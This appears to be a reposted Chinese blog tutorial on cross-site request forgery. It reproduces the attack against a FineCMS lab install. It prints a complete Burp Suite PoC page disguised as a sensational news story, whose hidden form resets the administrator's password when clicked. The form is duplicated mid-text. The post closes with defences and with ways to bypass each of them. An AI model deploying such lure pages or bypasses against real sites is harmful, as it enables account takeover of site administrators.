CSRF跨站请求伪造——原理及复现
程序员文章站
2024-02-18 16:33:10
...
转自行云博客https://www.xy586.top/
原理
CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。
尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。
与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。
CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…造成的问题包括:
个人隐私泄露以及财产安全。
过程
复现
靶场
某finecms,该源码存在xss以及csrf漏洞
下载地址finecms
安装教程文件里有,这里不再说明
步骤
代码审计加抓包发现构造点
利用burp自带功能,生成csrf的payload
本地保存下来并访问
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<title>震惊!!! 某网吧机子竟集体瘫痪</title>
<link rel="icon" href="https://www.bilibili.com/favicon.ico">
<body>
<style type="text/css">
#sub{
font-size: 20px;
display: block;
height: 58px;
width: 150px;
margin: 30px auto 0;
line-height: 38px;
vertical-align: middle;
text-align: center;
font-size: 16px;
background: #00a1d6;
color: #fff;
border-radius: 10px;
transition: 0.2s;
}
.title {
text-align: center;
}
p{
font-size: 50px;
}
span{
font-size: 18px;
}
</style>
<script>history.pushState('', '', '/')</script>
<div class="title">
<h1>震惊</h1>
<h1>男子购买网络攻击工具当黑客 致40多家网吧瘫痪!</h1>
<h2>原因让网友无语......</h2>
</div>
<div>
<p><img src="https://n.sinaimg.cn/spider202089/73/w344h529/20200809/15d4-ixkvvue4830298.png" align=left border=0>
<img src="http://p4.itc.cn/images01/20200810/8d01f2d0c64a4c308415de0081288005.jpeg" align="right" border=0 width="344" height="529">
<div><span>网络并非法外之地,如果因为个人在网络上的行为,致使他人遭受权益损害或者损失的话,同样会遭受到法律的惩罚。<br>
据媒体报道,近日,山东济南的一位年轻小伙王某某,因为在网络上发动网络攻击,致使40多家网吧网络瘫痪、频繁掉线。
随后,这位男子在当地被*机关逮捕。只是这个男子的动机,着实让一众网友无语,其自称到,这样做纯粹是因为好玩,看到别人断网就兴奋。</span></div></p>
<form action="http://finecms.com/admin.php?c=member&m=edit&uid=1" method="POST" name="hack">
<input type="hidden" name="page" value="0" />
<input type="hidden" name="member[email]" value="1@qq.com" />
<input type="hidden" name="member[name]" value="1212" />
<input type="hidden" name="member[phone]" value="12" />
<input type="hidden" name="member[password]" value="123456" />
<input type="submit" value="点击查看全文" id="sub"/>
<img src="http://img4.myhsw.cn/2020-08-10/ACI4nKVTvKdHmM5u.jpg" align="center" height="330" width="800">
</div>
<script type="text/javascript">
//document.hack.submit()
</script>
</form>
</body>
</html>
当管理员点击查看全文时,将会自动提交表单来修改密码
<form action="http://finecms.com/admin.php?c=member&m=edit&uid=1" method="POST" name="hack">
<input type="hidden" name="page" value="0" />
<input type="hidden" name="member[email]" value="1@qq.com" />
<input type="hidden" name="member[name]" value="1212" />
<input type="hidden" name="member[phone]" value="12" />
<input type="hidden" name="member[password]" value="123456" />
<input type="submit" value="点击查看全文" id="sub"/><form action="http://finecms.com/admin.php?c=member&m=edit&uid=1" method="POST" name="hack">
<input type="hidden" name="page" value="0" />
<input type="hidden" name="member[email]" value="1@qq.com" />
<input type="hidden" name="member[name]" value="1212" />
<input type="hidden" name="member[phone]" value="12" />
<input type="hidden" name="member[password]" value="123456" />
<input type="submit" value="点击查看全文" id="sub"/>
此时我们已经成功修改了管理员的密码,并可以登录了
防御方式
- REferer头防御
- 加验证码
- token
- 自定义请求头
绕过方式
- referer绕过把我们的csrf文件名改为信任的域名
- 看验证码是否生效第二看验证码是否多次请求都不会过期
- 第一找token加密规则,第二xss打token
- 抓包查看私有请求头,然后通过xmlhttprequest来创建请求头
上一篇: CSRF 跨站伪造请求
下一篇: vue中nextTick()的理解及使用